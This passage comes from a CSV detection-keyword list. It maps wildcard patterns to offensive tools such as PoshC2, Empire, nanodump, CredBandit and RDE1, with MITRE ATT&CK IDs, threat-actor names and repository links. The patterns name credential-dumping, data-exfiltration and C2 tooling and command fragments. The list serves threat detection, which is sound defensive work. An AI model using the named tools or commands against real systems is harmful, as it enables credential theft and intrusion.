Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*crawlLdrDllList*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" +"*crde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*crde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*crde::utils::checker*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*crde_x64.exe dns -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*crde_x64.exe https -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*CREATE DATABASE C2;*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*create_dummy_dll_file*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*create_protected_process_as_user*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*create-aws-instance.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*CreateC2Dialog.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*CreateC2Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*createdaisypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createlinuxpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Create-MultipleSessions.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Create-NamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*createnewpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createnewshellcode*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createpbindpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*CreateProcessAsUser*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*createproxypayload -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createproxypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Create-SuspendedWinLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Create-WinLogonProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*credBandit * output*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","0","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*credBandit.*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*credBanditx64*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*creddump.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Credential Guard bypass might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialDumping_KiwiOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialDumping_SunLogin.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialDumping_WindowsHashDump.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialDumping_WindowsWDigestEnable.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialInFiles_BrowserData.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialInFiles_WindowsSoftware.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Credentials Found in Configurations!*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*Credentials*hekatomb_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Credentials/CacheDump.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Credentials/certsync_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Credentials/LSASecrets.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Credentials/SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 